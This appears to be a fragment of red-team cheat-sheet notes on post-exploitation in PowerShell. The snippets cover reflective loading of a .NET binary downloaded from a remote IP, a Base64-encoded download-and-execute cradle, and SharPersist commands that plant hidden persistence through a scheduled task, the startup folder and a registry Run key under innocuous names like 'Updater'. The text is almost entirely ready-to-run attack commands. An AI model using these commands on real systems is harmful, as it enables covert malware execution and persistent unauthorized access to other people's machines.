1
2
[system.reflection.assembly]::LoadFile("file")
[namespace.class]::Main()
Binary reflective loading
1
2
3
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/binary.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[binary.Program]::Main("".Split())
Presistance
-Task Scheduler
Using SharpPresist
1
2
$str = 'IEX ((new-object net.webclient).downloadstring("http://10.10.10.10/payload.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
The above snippet will produce a Base64 string which will be supplied in the snippet below:
1
.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64 ENCODED STRING HERE" -n "Updater" -m add -o hourly
-t –> the desired persistence technique.
-c –> command to execute.
-a –> any arguments for that command.
-n –> the name of the task.
-m –> to add the task (you can also remove, check and list).
-o –> the task frequency.
-Startup Folder
1
.\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_HERE" -f "UserEnvSetup" -m add
-f –> the filename to save as.
-Registry AutoRun
1
2
3
4
5
6
7
8
9
10
./SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
Output:
[*] INFO: Adding registry persistence
[*] INFO: Command: C:\ProgramData\Updater.exe
[*] INFO: Command Args: /q /n
[*] INFO: Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[*] INFO: Registry Value: Updater
[*] INFO: Option:
[+] SUCCESS: Registry persistence added
-k –> the registry key to modify.
-v –> the name of the registry key to create.